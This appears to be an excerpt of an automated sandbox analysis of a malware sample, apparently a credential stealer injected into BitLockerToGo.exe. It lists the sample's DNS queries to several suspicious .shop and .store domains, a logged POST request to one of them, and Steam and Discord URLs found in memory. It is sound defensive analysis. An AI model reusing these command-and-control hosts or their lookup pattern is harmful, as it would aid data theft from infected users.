http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: dividenntykw.shop
                Source: global trafficDNS traffic detected: DNS query: gutterydhowi.shop
                Source: global trafficDNS traffic detected: DNS query: ghostreedmnu.shop
                Source: global trafficDNS traffic detected: DNS query: offensivedzvju.shop
                Source: global trafficDNS traffic detected: DNS query: vozmeatillu.shop
                Source: global trafficDNS traffic detected: DNS query: drawzhotdog.shop
                Source: global trafficDNS traffic detected: DNS query: fragnantbui.shop
                Source: global trafficDNS traffic detected: DNS query: stogeneratmns.shop
                Source: global trafficDNS traffic detected: DNS query: reinforcenh.shop
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: gravvitywio.store
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dividenntykw.shop
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: BW4pTs1x3V.exeString found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
                Source: BW4pTs1x3V.exeString found in binary or memory: http://cevcsca2021.ocsp-certum.com07
                Source: BW4pTs1x3V.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
                Source: BW4pTs1x3V.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: BW4pTs1x3V.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: BW4pTs1x3V.exeString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: BW4pTs1x3V.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: BW4pTs1x3V.exeString found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
                Source: BW4pTs1x3V.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
                Source: BW4pTs1x3V.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: BW4pTs1x3V.exeString found in binary or memory: http://subca.ocsp-certum.com02
                Source: BW4pTs1x3V.exeString found in binary or memory: http://www.certum.pl/CPS0
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstaticr
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/banners/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/channel-icons/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/guilds/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/icons/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/role-icons/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/splashes/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=8vRVyaZK
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=w4s3
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&l=e
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                Source: BW4pTs1x3V.exeString found in binary or memory: https://discord.com/MESSAGE_REACTION_ADDTHREAD_MEMBER_UPDATEunmarshall
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C0000A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9//sticker-packs
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9//voice/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9//voice/regions
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C0000A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/09Az~~
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/applications
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/channels/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/gateway
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/gateway/bot
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/guilds
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/guilds/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/guilds/https://discord.com/api/v9/channels/https://discord.com/api/v9/use
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/oauth2/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/oauth2/applications
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/stage-instances
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/stickers/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C000096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/webhooks/
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dividenntykw.shop/api
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dividenntykw.shop/t
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drawzhotdog.shop/api
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/api
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store:443/apifiles/76561199724331900
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offensivedzvju.shop/
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offensivedzvju.shop/apiC
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: BitLockerToGo.exe, 00000003.00000002.1919363616.0000000002FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/apii
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C0000E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/active.json
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C0000E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/active.jsonhttps://status.discord.com/api/v
                Source: BW4pTs1x3V.exe, 00000000.00000002.1878415908.000000C0000E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/upcoming.json
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.0000000003063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: BitLockerToGo.exe, 00000003.00000003.1919145050.0000000003077000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.1905526409.000000000306A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
